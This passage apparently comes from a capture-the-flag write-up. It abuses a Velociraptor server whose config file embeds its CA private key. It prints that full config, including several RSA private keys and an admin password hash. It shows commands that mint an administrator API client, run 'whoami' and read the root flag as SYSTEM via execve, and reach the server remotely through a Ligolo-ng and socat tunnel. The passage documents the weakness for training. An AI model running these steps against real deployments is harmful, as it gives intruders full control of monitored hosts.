  writeback_windows: $ProgramFiles\Velociraptor\velociraptor.writeback.yaml
  level2_writeback_suffix: .bak
  tempdir_windows: $ProgramFiles\Velociraptor\Tools
  max_poll: 60
  nanny_max_connection_delay: 600
  windows_installer:
    service_name: Velociraptor Server
    install_path: $ProgramFiles\Velociraptor\Velociraptor.exe
    service_description: Velociraptor Server Service
  darwin_installer:
    service_name: com.velocidex.velociraptor
    install_path: /usr/local/sbin/velociraptor
  version:
    name: velociraptor
    version: 0.72.4
    commit: d568709b
    build_time: "2024-07-04T14:03:05Z"
    install_time: 1725636828
    compiler: go1.22.5
  use_self_signed_ssl: true
  max_upload_size: 5242880
  local_buffer:
    memory_size: 52428800
    disk_size: 1073741824
    filename_linux: /var/tmp/Velociraptor_Buffer.bin
    filename_windows: $TEMP/Velociraptor_Buffer.bin
    filename_darwin: /var/tmp/Velociraptor_Buffer.bin
API:
  hostname: localhost
  bind_address: 127.0.0.1
  bind_port: 8001
  bind_scheme: tcp
GUI:
  bind_address: 127.0.0.1
  bind_port: 8889
  gw_certificate: |
    -----BEGIN CERTIFICATE-----
    MIIDQjCCAiqgAwIBAgIRAKYUQbeZsVYxzdNftJYKsIowDQYJKoZIhvcNAQELBQAw
    GjEYMBYGA1UEChMPVmVsb2NpcmFwdG9yIENBMB4XDTI0MDkwNjE1MzQwNFoXDTI1
    MDkwNjE1MzQwNFowKTEVMBMGA1UEChMMVmVsb2NpcmFwdG9yMRAwDgYDVQQDDAdH
    UlBDX0dXMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA06PnTBbNesX2
    SPzeL4CIdF8mhyGRU7kdargtiJ5I9v0QmSFZqzlEZjfG7CFfdsP7PR2e1xVrnqT1
    LD9DjgiooyZATp8R3GiZq9+d8Xmf+oMUcP14grjiyrvvaYHm44Clv8ZHEJ4tcY3a
    AQfbPSRMhniMmlaWoD+PeelIKhnmt51jMVGneMTHnXMr5/5J2K2uUrLONl2j/Ifz
    OTCNsAH4eO/kCrO/e6E/6vLxPCpf1VrmasYiKmvGLynJmHERmdcXxjDzUMNRHuDN
    fVSpnES8djZD0ebDYyRmEjLX/9rrIVGiIZfhp1CE+Vh4SZufupLewbWnmej5VyDi
    HiNLB8H6kQIDAQABo3QwcjAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYB
    BQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHwYDVR0jBBgwFoAU300cohhg
    ajq+ReeNb/KTmJHBcwAwEgYDVR0RBAswCYIHR1JQQ19HVzANBgkqhkiG9w0BAQsF
    AAOCAQEAxBdSHpT10hPHSa9BgsegHnwHMY7TT8n6Tik0Z5IW6v3n2XvUy94V6PPr
    4HijeAqHK6e9uPaNg6JVipvzz8TK0j1dhk08C94OYXCLq6z8AjNr+h2BMTWVQxoz
    K3zeoUJxU3dM4/zSO6i9rt/XqeCZ3EHjGRdVmvzAflcJagjuDBgbj/jtf5mfSkv3
    XU0ald7/50jqqes8IgvJmiAJQXvfnS5LIZNwJdrYgJUx5mSLL8PPq+UkZqkUG3bW
    gq16sjLC6asEspqrXPdh4RvovW6m3stT9kFszTYHd9+XB5uKEP3m1Zp5QlB/gIUV
    2pB+YF8wgSEbAYDOdU7AC9imbqT+Kg==
    -----END CERTIFICATE-----
  gw_private_key: |
    -----BEGIN RSA PRIVATE KEY-----
    MIIEowIBAAKCAQEA06PnTBbNesX2SPzeL4CIdF8mhyGRU7kdargtiJ5I9v0QmSFZ
    qzlEZjfG7CFfdsP7PR2e1xVrnqT1LD9DjgiooyZATp8R3GiZq9+d8Xmf+oMUcP14
    grjiyrvvaYHm44Clv8ZHEJ4tcY3aAQfbPSRMhniMmlaWoD+PeelIKhnmt51jMVGn
    eMTHnXMr5/5J2K2uUrLONl2j/IfzOTCNsAH4eO/kCrO/e6E/6vLxPCpf1VrmasYi
    KmvGLynJmHERmdcXxjDzUMNRHuDNfVSpnES8djZD0ebDYyRmEjLX/9rrIVGiIZfh
    p1CE+Vh4SZufupLewbWnmej5VyDiHiNLB8H6kQIDAQABAoIBAHeNhhIga3CoNUjj
    tytEQ1DhkyUQnEScNHbdlbMwHu2O5PprsXicv/uyFGe9Lm0rplfOzLSZQBL9AhY9
    oo6wa3rGF9uR1ggY+n3xswn+d5WOyFRPiuzlPg/h/Aswu1nWiUr82ZYUlH0p8XVV
    l85BHA12OY7RzQK3BPiMBBzsRr1/XtfmkwPaR3/raM6K+MULwx5WMcT8mEBgtOxz
    sGJHvZ6dlaoPZ5EuXH31fJnH0b4+QVJKi1Sko6E8p2yoL+sWNYygfdk166yoTB3y
    Hg4rmnSIHew0u+iMKsc0QrT4dX7gvXZrFd8Ipcytv5mPNFiMSxvUk7rUOTIPQiHz
    nuBlRRUCgYEA6B6NhsVA3a6AJsNEWzzgn/wDa189fEtAdgEDn8ma9IuA8jSgrb1c
    0dJxyrk+0K/LPlTcgnWd0QYB78XBUey987JYFdJ8IXgcYm2bLw4grnR5kRxU8aUD
    KBnwEfegKS6F6iHDEB6SxicI6gCA0pZvU7MK3fFpvY38TjocGhmCOx8CgYEA6Wn7
    aCMX9h3B7O80rY8izsZ6Rzh47ZfIsZeuYQ49I4pVS4ayYShrfPtC2XEjiEzqFkPt
    B1VEZVKkx40qdU934sJ22w+uZm9YAalRmgfB1/jasvhEYKOcPmVbwg+0F3+XILuV
    XVAhp4XMqrfH0K0rOmZi0ctZUYZFkVu/xHDyxE8CgYB5SgW/53CWpak3GA+u8Sea
    0W/j+jdBrHy5bJw9MXZz1DWD2jYfsvQ+e42UVanaGBHGt0cmMFlPsKjwZlA3A9LZ
    9VYLyRmtz3pdgFJ3ixVOs3QWfExynDwDB1KnwNIC0tmM1yl7Uc52Fk2VIMAvygXQ
    IZ1LDeun7fpp0fl/NdcUFwKBgQDXxvL0BSU8j6vbxhKzs9PgxZj6yBj6w8tzaZ55
    +LjKZzKMvHug18XuZzUYYMARW9E3PhocIlY1ON4936F1iz5v8YgA4RE/fwUjnAxk
    0XEAn/xFYL+NexKQmBDoaK363yetydu9xLsn68gVtgnRPpTsywPloA/1DqS3SNMR
    3bx/fwKBgARuKalgwUyZrhgfD2vCGpR/AY3uPr0fNlf5fG+OXbN6Nszble9ygEy2
    xE2oXqlSzerMO7ZDjlXvB515RS+THCHCgKW3WiULDa7a4SmgW5blULikwFud0+rb
    jtGge0RBkkRizs9T1rv5qOJObnVEn8EOZlj8ICfcNxnG45I/J44+
    -----END RSA PRIVATE KEY-----
  public_url: https://localhost:8889/
  links:
  - text: Documentation
    url: https://docs.velociraptor.app/
    icon_url: data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1MyIgaGVpZ2h0PSI2MyIgdmVyc2lvbj0iMS4xIiB2aWV3Qm94PSIwIDAgNTMgNjMiPjxwYXRoIGQ9Ik0yNyAzYy0zIDItMTMgOC0yMyAxMGw2IDMyYTEwMyAxMDMgMCAwIDAgMTcgMTZsNi01IDExLTExIDYtMzJDMzkgMTEgMzAgNSAyNyAzeiIgZmlsbD0iI2ZmZiIgZmlsbC1ydWxlPSJldmVub2RkIi8+PHBhdGggZD0iTTI2IDBDMjMgMiAxMiA4IDAgMTBjMSA3IDUgMzIgNyAzNWExMTMgMTEzIDAgMCAwIDE5IDE4bDctNiAxMi0xMmMyLTMgNi0yOCA4LTM1QzQwIDggMjkgMiAyNiAwWm0wIDU1LTYtNC04LTktNS0yNnYtMWwyLTFjOC0xIDE2LTYgMTYtNmwxLTEgMSAxczggNSAxNyA2bDEgMXYxcy0zIDIzLTUgMjZsLTggOWMtMiAyLTQgNC02IDR6IiBmaWxsPSIjYWIwMDAwIiBmaWxsLW9wYWNpdHk9IjEiIGZpbGwtcnVsZT0iZXZlbm9kZCIvPjxwYXRoIGQ9Ik0zOSAxOWExMzQ3IDEzNDcgMCAwIDEtMTMgMjZoLTJMMTQgMTloM2wyIDEgMSAxdjFhMjUwIDI1MCAwIDAgMSA2IDE3IDUyODkgNTI4OSAwIDAgMCA5LTIwaDR6IiBmaWxsPSIjMDAwIiBmaWxsLXJ1bGU9ImV2ZW5vZGQiIHN0cm9rZT0iIzAwMCIgc3Ryb2tlLWRhc2hhcnJheT0ibm9uZSIgc3Ryb2tlLWxpbmVjYXA9ImJ1dHQiIHN0cm9rZS1saW5lam9pbj0ibWl0ZXIiIHN0cm9rZS13aWR0aD0iMSIvPjwvc3ZnPg==
    type: sidebar
    new_tab: true
  initial_users:
  - name: admin
    password_hash: 43b7f91087b5a1bcb978d776a23330d3bf4a2c31017c0b1865ddae21c942e06d
    password_salt: 01e48c09468dcde741b493c49904cfdfcb4fa9a188efb27fa233e70265a6d4e5
  authenticator:
    type: Basic
CA:
  private_key: |
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpQIBAAKCAQEA4ycNgoEBGTgOFhs9okotlq3uN9lxxjzZkkgm+O0xtwSFu2D7
    w+9363BIYV9osVi1z6X7O6kHTHvWYua1dekYF8NuUfcdd2sFOdSfylHjYjMZq0Af
    SkglBzt3vJAxLiwtMFduiu+k1V/CiJtL5JST+Jqb+zI/QoBwTeKhsE6gdcu4dsMk
    2p1CZcGrGP5RlObu8OMI9s+vjjjgPv0vTRIid0sPn3HfnZmtgpM6hRGIqGtxhA/r
    3iH7vjhUclmjtz3HtoFee2V55YtwIbUDKBW9cOZejuSEM4aylO4p3Nykm/JBvtr8
    0AeI8Bi1NPsG0pMnJF2PuefdriBt7Vb3cvi/WwIDAQABAoIBAHUmxwjvj6l6B4nP
    MtJof2qe+aVEODGNYIjZPYBUlLdXVcF2G2LKNobuueW+VzhgECSv7gqu+lyv4bnQ
    UvYk6ZAX8uXDFSdpwqA40NB/u04CHNL9lyWwX6iDOxW9KCAwGH4+GXz+a3zAjov1
    zAZvuoEU/C1plMavhzwkDk/nvUoCdrSLNPsz0s0RbNkR7fPcJ2QrwYIyHhNb56Ab
    Jyy4A8gXUz0zkL4Upk6bHPxhFeW9gA9BlAcB8DsdcPxTqbrus+B3yrfKO+hqWT0w
    /jtDssJxdnkULazO2e9ypEJ2XsNEr4NYi1PcsHD667T6EnKQm6odGWN/455FWbt0
    LFfoCkECgYEA7bUZ8wZh8M4C+JRm5fKq7N/pIQniQfDf+naFy7nG+9QiZIsofyHB
    0PiuzSXNDEVsaSJn5cn4+BFO1RfRaHmM/sUsrKzaUKO5fTa4aAhZXUBmdw+s1Sm1
    HbXea/uKTQEdzwL/tcRBQxIr2RveCCykYO/p5pTd9YKVtCGx5PgOHYcCgYEA9KIE
    fqvfHP4NZDbsExC83K3Dgx3MKUlKosyBRVdQW6d/eJJymEa5WcHOxM9Q81ZOi7VS
    M3UfU1C1ihCiuYZWNZcFeiBODoQe40nqxBzAklAYtavagMyluP8zdnbnFek1ncDy
    IXIdIPv0COBLiJSUkQubcWVRG95mu/h/oMd4pI0CgYEAsknqS6hW32l1OwL75q7L
    Wt1amygxpunG5LHvCm2t/IYQwb7KQgiMuXM8kKwwjmqntHdU3DpP3agFq7iwnR7G
    DPTQ3DbNjDwwzOS1DXptpI7AC78bD8q3iLA3QmCpS7ZxqCoEp02q8WZ4st+++fyZ
    0gdANW0kyZcHN9Mp/aW72JMCgYEAhjImgxJndzEKSZIzWJYS9H/Bw7hh2bgh4EKN
    G2u1YkH1FEBJ6qzJWqqNcbtEbehHeC5EZIP4ZizdGVrc2ScPPaCV2ZPFHgNuKkLP
    LTuUi+6yT15xo7wfoOcl5PN++q8OwXYpnR1LS1/LU98usELJaPPUFpV8s+wBsVW1
    NY6W6LUCgYEA6kDkirjXD9JH6P3+L6k3HPnt9WIQYlBALpPtddBpTezGjNiJYI0L
    /GrDzvObjMKSBwwi0kwjKAlYz2TTRercnR5mxGvJP0oAUGH7LE4WNctJ9weSeHVv
    8k3Z45vLlh/YEZ8EomicZxJXOmZuzu+lVkQnsJncQrcHXb+eVIzQPjQ=
    -----END RSA PRIVATE KEY-----
Frontend:
  hostname: localhost
  bind_address: 0.0.0.0
  bind_port: 8000
  certificate: |
    -----BEGIN CERTIFICATE-----
    MIIDWDCCAkCgAwIBAgIRAPXtfqGOQcgRFqEpDR1b9WwwDQYJKoZIhvcNAQELBQAw
    GjEYMBYGA1UEChMPVmVsb2NpcmFwdG9yIENBMB4XDTI0MDkwNjE1MzQwNFoXDTI1
    MDkwNjE1MzQwNFowNDEVMBMGA1UEChMMVmVsb2NpcmFwdG9yMRswGQYDVQQDExJW
    ZWxvY2lyYXB0b3JTZXJ2ZXIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
    AQCg56lQ2EDtnQkvzPBjCtztxbPJk0UQEeZnXOGU0ckkk0MnmOwiBmODh3EvP6qh
    K3BfpkZDe7bDie70FZQQNDvE+kt+HsQ09p7ct9nJpuK32rl5v1OPw17RVWEczmk8
    OTXn3tv53aIUEbZbBzV4ykQeaMMX3qSEHY3zFUO+aR9VUYC2W7lb9QHZkze7Q0q5
    L2kECzvEaJmeofeaCdE2OxOT0a0IBQuoEzDyjfhfQWqiYzJEhTdUxI6ZAF436J3Q
    RKjtO/maGMa1AX0yfe/0xnt/ylTZ0liHdHINph2Nfgftkq6xQGy6rklvA3N3Fer+
    GQnS+m9CSlbgbrsTF3+vqw7DAgMBAAGjfzB9MA4GA1UdDwEB/wQEAwIFoDAdBgNV
    HSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAfBgNVHSME
    GDAWgBTfTRyiGGBqOr5F541v8pOYkcFzADAdBgNVHREEFjAUghJWZWxvY2lyYXB0
    b3JTZXJ2ZXIwDQYJKoZIhvcNAQELBQADggEBAEOgxsbWOfpkB8s2fxS2w5tKxGZZ
    F+B5ZhBocxrDKMbKjAtX6rmSSlsuXnZ7Kv0OnCYnQQa9Qojo6Xqt5YRp9i+c5Dw3
    u5a5wTvvzrMFs8GrUm1YHPA6nzBGCXPLjqwpI6OnCrDHJCgIyNh6Sl6pg6IAutyW
    QqRRO6fQlj4o8qwEz/jmL68/rDOmw0B/BcvKZ7k9dJoAYw+niOEAGxi1AtfElWQS
    7rqG+J8J9mrvjtbsUSoXhtmp7W+3VOlxXtUapv0hVLmEwC++XMRsLLHoZ5jSXgRn
    HhytjMV/UyABzK669V7+K0Kcm3NCHjX1D8P84cxNh9fSg+NNg5orZBnPClE=
    -----END CERTIFICATE-----
  private_key: |
    -----BEGIN RSA PRIVATE KEY-----
    MIIEogIBAAKCAQEAoOepUNhA7Z0JL8zwYwrc7cWzyZNFEBHmZ1zhlNHJJJNDJ5js
    IgZjg4dxLz+qoStwX6ZGQ3u2w4nu9BWUEDQ7xPpLfh7ENPae3LfZyabit9q5eb9T
    j8Ne0VVhHM5pPDk1597b+d2iFBG2Wwc1eMpEHmjDF96khB2N8xVDvmkfVVGAtlu5
    W/UB2ZM3u0NKuS9pBAs7xGiZnqH3mgnRNjsTk9GtCAULqBMw8o34X0FqomMyRIU3
    VMSOmQBeN+id0ESo7Tv5mhjGtQF9Mn3v9MZ7f8pU2dJYh3RyDaYdjX4H7ZKusUBs
    uq5JbwNzdxXq/hkJ0vpvQkpW4G67Exd/r6sOwwIDAQABAoIBABDuT3KiTrKyA3V0
    KxdA3V5nnzNmu62lNIlLzLDMIk4m8LoJ7U7nPTFp3w8Js/qhh4GJDXusWN7adLpa
    SuoplOB1NdxfgGXSTYUME26UkOanrTySVUibVi7QvRc64PflTTbIzHzORW+3LWkG
    qSm8ns5UV7L7SnRcZ8NcSXSPuyxO7GU4vBz4WgAjrh957OeZ3qoFXrpCjrY4KBpo
    FRTsN7H6eW4jrqR0UH8rBWJWSfZbDeF639/uT/Am9TNdjf6eio6Go7PS3UnhUboD
    qUnRRZ/i7qyLOxse7/nN3JZ/n8A1E8fKi6lzsvVxdl4A3FiJTAG0+6IEESKFcFPc
    HaKUlQECgYEAwAoloV5zFvm/+QMHA88duzhXG7cmUjj1U5l5sEOJGLrhDmClMsvU
    8WvBMgD4DitFRXMcjBwoLrT2+ovwuOToaq28yEMFJOWeQxehElmlQU3/BubKKbwW
    5BzKqwtEXe4LPeKHIbEO4YcESykevPToQRNDUj/2PkTJMeiyq4Ut/tsCgYEA1n7h
    G1ef83f3iqFdrG0VmqTyKsHG/pt4bws/Xjzkl7jI/o6I80lsZNE2VQTCEvAZnCrF
    3xbSbjP3XyF4vBPg84RaSLXeIjpaewVHqD4ULkWr4K3Dl7DbqFhJsB6UTyCcrOob
    w3bvuYjMO1TTKFdigkCRysghfe6O2/nSEDSA8DkCgYAME1dEa2T/R9sbdGZHhgmP
    kT5g/sZJG03J4Pe27rg7Nt0aA1e/9vM/7w+p7keq1Gu5r0BXSxn3vedd39jWN4ap
    1pztVtGG/W1TOLQnLD3o+leT/oUt1Kb31xujX8T/xw0r6genRbPy2IObmk1Vgmzs
    UqLEFEOOrNKd8czyXiCDSwKBgAR4hIyjWOwkNf6numIbq/WbNoj5nQI1j18RJvL5
    5fHboiTcJ7Kady3qxm0jOkBWzNHaemFaAmzVnHRZKEETUP8CZTdawxSHjtc9lu7E
    zHribOCz/n2s7AcoP/Dx0jmL/ngEMSvz0K9XUJpz/Cq9F4qLef52CWysikG/hUdd
    MMrRAoGAcPum1dTTGA2mxdhvFt1u7P3Fm/odRknxc/e0XGwV7XYAQ9Q5zuuBk4qZ
    R7proGkDxl8ofBfF7XTMv3HX3Q+L4iJl1SR8GNo15+o2yhYpSgCziQRcjDU6eKpd
    Nogpnbs9EeMrd/ctCGubMQVa5ZybdByMU082iqaObson+3+A498=
    -----END RSA PRIVATE KEY-----
  dyn_dns: {}
  default_client_monitoring_artifacts:
  - Generic.Client.Stats
  GRPC_pool_max_size: 100
  GRPC_pool_max_wait: 60
  resources:
    connections_per_second: 100
    notifications_per_second: 30
    max_upload_size: 10485760
    expected_clients: 30000
Datastore:
  implementation: FileBaseDataStore
  location: c:\datastore
  filestore_directory: c:\datastore
Logging:
  output_directory: c:\datastore/logs
  separate_logs_per_component: true
  debug:
    disabled: true
  info:
    rotation_time: 604800
    max_age: 31536000
  error:
    rotation_time: 604800
    max_age: 31536000
Monitoring:
  bind_address: 127.0.0.1
  bind_port: 8003
api_config: {}
server_type: windows
obfuscation_nonce: rr5IuJp3gwY=
defaults:
  hunt_expiry_hours: 168
  notebook_cell_timeout_min: 10

That contains a certificate. This is default on Velociraptor installations

  • The documentation encourage you to delete those security reasons but it’s not enforced

Using these certificates, it’s possible to create an API key and then perform actions as administrator inside the application using the server api.

Attack locally on the Windows target

Create an API client file with CA private key:

C:\PROGRA~1\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml

Double check:

C:\PROGRA~1\VelociraptorServer>type c:\temp\api.config.yaml
ca_certificate: |
  -----BEGIN CERTIFICATE-----
  MIIDSzCCAjOgAwIBAgIQIRnpQjrW1aIURqQbu2cKojANBgkqhkiG9w0BAQsFADAa
  MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjQwOTA2MTUzNDA0WhcNMzQw
  OTA0MTUzNDA0WjAaMRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwggEiMA0GCSqG
  SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDjJw2CgQEZOA4WGz2iSi2Wre432XHGPNmS
  SCb47TG3BIW7YPvD73frcEhhX2ixWLXPpfs7qQdMe9Zi5rV16RgXw25R9x13awU5
  1J/KUeNiMxmrQB9KSCUHO3e8kDEuLC0wV26K76TVX8KIm0vklJP4mpv7Mj9CgHBN
  4qGwTqB1y7h2wyTanUJlwasY/lGU5u7w4wj2z6+OOOA+/S9NEiJ3Sw+fcd+dma2C
  kzqFEYioa3GED+veIfu+OFRyWaO3Pce2gV57ZXnli3AhtQMoFb1w5l6O5IQzhrKU
  7inc3KSb8kG+2vzQB4jwGLU0+wbSkyckXY+5592uIG3tVvdy+L9bAgMBAAGjgYww
  gYkwDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
  AjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTfTRyiGGBqOr5F541v8pOYkcFz
  ADAoBgNVHREEITAfgh1WZWxvY2lyYXB0b3JfY2EudmVsb2NpZGV4LmNvbTANBgkq
  hkiG9w0BAQsFAAOCAQEAt4tFN1KZF1wrmhOT/1f0DXnwgaACkhJmC2HARfp46hGY
  FvqumxwNkUTc0hyPdwK2iy+57RCTS70CgGvsvSf6bDx7jSBpBJ8KzYXxOwcNRPaK
  4KJV7ZQQA2U6ax3c5LNuUupY63tRh7j/AgeVvnVP8CLTEvWTHD1kEQ/cTyn0XDSn
  7yINImANYuWJkWO6i9eKXYxTGXWhG+n1xEmQvZIed8SsOyt/pvTbFnUtKNTokUnb
  B71PNi/CkZRJpULuAk9eJvLgKhEgIeVpY2rxYvVPBJNqwWwGypKOzWGX0+ueQReQ
  is5cJn9DbPiu82yg/HdQu9vfroG+QktqdZgx5KJkxA==
  -----END CERTIFICATE-----
client_cert: |
  -----BEGIN CERTIFICATE-----
  MIIDPTCCAiWgAwIBAgIQD4ZuNX4XndXXQtWlf8KDtDANBgkqhkiG9w0BAQsFADAa
  MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjUwMjAxMDIzOTU3WhcNMjYw
  MjAxMDIzOTU3WjAnMRUwEwYDVQQKEwxWZWxvY2lyYXB0b3IxDjAMBgNVBAMTBWFk
  bWluMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3C3E8rlKk8894rAw
  C9ke/ePB6Bt8hD2O5beNy22cCLOoYzkPecuRTaE16Ko7Vd4sCQNrHs367/LAgara
  7DbsnG22mikaqIxtLAekQZFRe+h/6uV110hTmpju6g2TWonFehrFq/up9kyeaJYK
  cTPchsSElW0gfHK+fua3aC2jcG2QUzgEOCPpyq9jOZFcI2ZLO4fvNLFeFwJK+jxS
  3Qz6zo45cO6Ray9OR80A46pvrBc/aRoiGvviCGVbLn4Lp/dEzGHzAfSwj+0FgmR1
  4uuOLZ6/OareAZijf3skZP+q8Pxu6dCR/Ts7drIz30cL0MbbkGZjmf3+YYeEhrb0
  j7jFbwIDAQABo3IwcDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUH
  AwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHwYDVR0jBBgwFoAU300cohhgajq+
  ReeNb/KTmJHBcwAwEAYDVR0RBAkwB4IFYWRtaW4wDQYJKoZIhvcNAQELBQADggEB
  AJtYfFfcKE5jK5pB8Vnt2vVfSQL3Y/6tVePxbYMTwe5S2gva4HNpXhJOIaCF89lS
  fKCgnAGxIdPz/4ST4mvvUkE8Yv7jgafKDSZTkF2xYhrBXZia8QcdXJVXw5hGfui0
  7MjcDDKOYP+ecE0OavBjNZk91wJry/4mhuzT3UsTj+Y4/pi0UtpK7M6fpWBWkT0H
  roROTG8R1wfM0MgR/llK5uj+RkfF6Tbcf4MAyRNAOdC2t2yYY94jGKnf3nDpmVy8
  767CSZc/o9AfM0YjJDBgFvDb8XLmf0hQu87l6ehlf49lmMrHczQqKhA2xtpbnu/p
  vY0EGs1sRBmWH2k6imo9aGU=
  -----END CERTIFICATE-----
client_private_key: |
  -----BEGIN RSA PRIVATE KEY-----
  MIIEpAIBAAKCAQEA3C3E8rlKk8894rAwC9ke/ePB6Bt8hD2O5beNy22cCLOoYzkP
  ecuRTaE16Ko7Vd4sCQNrHs367/LAgara7DbsnG22mikaqIxtLAekQZFRe+h/6uV1
  10hTmpju6g2TWonFehrFq/up9kyeaJYKcTPchsSElW0gfHK+fua3aC2jcG2QUzgE
  OCPpyq9jOZFcI2ZLO4fvNLFeFwJK+jxS3Qz6zo45cO6Ray9OR80A46pvrBc/aRoi
  GvviCGVbLn4Lp/dEzGHzAfSwj+0FgmR14uuOLZ6/OareAZijf3skZP+q8Pxu6dCR
  /Ts7drIz30cL0MbbkGZjmf3+YYeEhrb0j7jFbwIDAQABAoIBAQC0Wp1wQY0wRFsp
  /C5vFhwH1m+4pAM8A3yw+MkicJeWnSt6k3v0xWYxk7Mn8YGHFeU2QOGXKxy5Pjyo
  On73bQomHMytvKvEkrq+jUfkGZgIimt1yx3bCbjJ8yoI+LPSPvZOze1LsmsHgL1l
  aDoHfnbOwdzk1a39orQeGPj1UiUF6oSRKR29KVmnswpdCWe1slCmmEJDEAgfmhnG
  ofON39/5n98p6SxrOrIVunh4Fo6zMII3ui4qHiy+OSXMrpEPYjBpqIgG8TrMdgjT
  FaV6jOWKlheUhelt88eE30tWKrkeQQ7S+6Zw07rICswz7raIYm919qiE0hOHy1Iw
  3n2v9DYZAoGBAOx3lJKTiYk+sIIa4SJM6lpHk8WOFSZuPb9/M0XY8ily7DVYPhbp
  jGjPSQP2EKGUvbinVugJoVsbZbq9Ec2xfrLpHUrVXMhKDYOCI8SyOug38GeWUyTb
  EWYR88dRIqmdyszcgEvSgPtOpYhIyx2KbedZGei/95HaquN+Oxz96TrjAoGBAO5d
  wAhwR7Fi3xrg4Ix5iV+DAH7N+Yf4pJtY8yICQxEPo5hwQsR3sWWHQgL442WtGyd3
  hptwbSAzV7lnRyld6cadzCqzpcMAggK5Dtn2QcZWTB6ySRkGzQc0R+8DUzYScqss
  pYvtLAGBghlk3aZC/FThkhUA5aCu3hG7U7+oMhUFAoGBAJgovl6vNzIsN7IQj8vd
  iHN9WXYm3i8zguJFfH22guTvAVW2KYXe1K3grFAzNzJyHr7CVybKg5y3fXdzEBC2
  5RtE68dqkeCD3jxAMrnwIf2peTV+wpOVr5Vped9IszBHy+aVAK1JkBul2NhgVur0
  V5IlgImHdUvSVGI8qNcX/8sXAoGAAKaq5pr/5yEhAN7KXjfawzMFZlNDsjZgpLf6
  egZNjpdfWAQ+enDlQCS9bmqlnFp7r4DpEjWdZrAdNjls/VTvVYaKzzcMZdrzf/Rn
  cPr2NQd5T8Am6PWWy8U9yQ5WRNiKDaOilB5Ct4JWC6G15UVbkRPIpVwKRIUVwDCl
  yuk3sc0CgYBAbL2f4trFoiT05/oD0zjdxkXAOm9rnDQJsFfkzylfOJxnVfIe2sYx
  6mjqfOUYuqS0w0WoD+phGE/hs4GLueB16bL01Id2WRXTrHlFdKMmY1nlg2DAx61h
  yyABRvxHjtCqgMx62tCyOEOgDMLxOcB+rwFlj4ofXbg8wT8QLDtN2g==
  -----END RSA PRIVATE KEY-----
api_connection_string: localhost:8001
name: admin

Now we can run queries as administrator against the API, allowing us to use execve to run system commands:

C:\PROGRA~1\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','whoami'])
[
 {
  "Stdout": "nt authority\\system\r\n",
  "Stderr": "",
  "ReturnCode": 0,
  "Complete": true
 }
]

We can grab the final flag like this:

C:\PROGRA~1\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','type c:\\users\\administrator\\desktop\\root.txt'])
[
 {
  "Stdout": "VL{948164bdc2e92cc1eeb5699bbde09fa1}",
  "Stderr": "",
  "ReturnCode": 0,
  "Complete": true
 }
]

Attack remotely from our Linux machine

We use Ligolo-ng with the CIDR hardcoded 240.0.0.0/4 from ligolo and this: sudo socat TCP-LISTEN:8001,fork TCP:240.0.0.1:8001

Then we have our tunnel to access internally to Velociraptor.

  1. Transfer the server.config.yaml from the windows target to our attacker machine (it’s a goldmine since it has CA.private_key inside the server config file).
  2. Create a velociraptor client API config locally on your machine based on the grabbed server.config.yaml:
$ ./velociraptor-v0.72.0-linux-amd64 --config server.config.yaml config api_client --name admin --role administrator api.config.yaml
  1. Add admin roles to our config:
$ ./velociraptor-v0.72.0-linux-amd64 --config server.config.yaml acl grant admin --role Admin  

As Velociraptor uses gRPC to facilitate automation bindings, our plan is to use python and launch artifact collections against a client (the windows target).

To do that, we need python bindings for velociraptor: https://github.com/Velocidex/pyvelociraptor/tree/master

  1. Then the final step is easy as we can reach the velociraptor from our machine, just query like this to grab the final flag:
$ pyvelociraptor --config ./api.config.yaml  "SELECT * FROM read_file(filenames='C:/Users/Administrator/Desktop/root.txt')"

Exploiting via Artifacts

Note

Velociraptor is composed of the items below:

  • Server: Centralises the management and collected data.
  • Client: Agent that runs on each machine and executes the commands sent by the server.
  • Hunts: Automatic forensic searches to collect data.
  • Artifacts: Templates to define what data to search for and how.

Following the documentation Velociraptor - network communications, the Velociraptor GUI port (by default port 8889) using plain HTTP:

image

image

Let’s check the open ports (without IPv6):

c:\>netstat -taon -p tcp | findstr "LISTEN"
netstat -taon -p tcp | findstr "LISTEN"
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2188	InHost      
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4	InHost      
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       928	InHost      
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4	InHost      
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       928	InHost      
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       680	InHost      
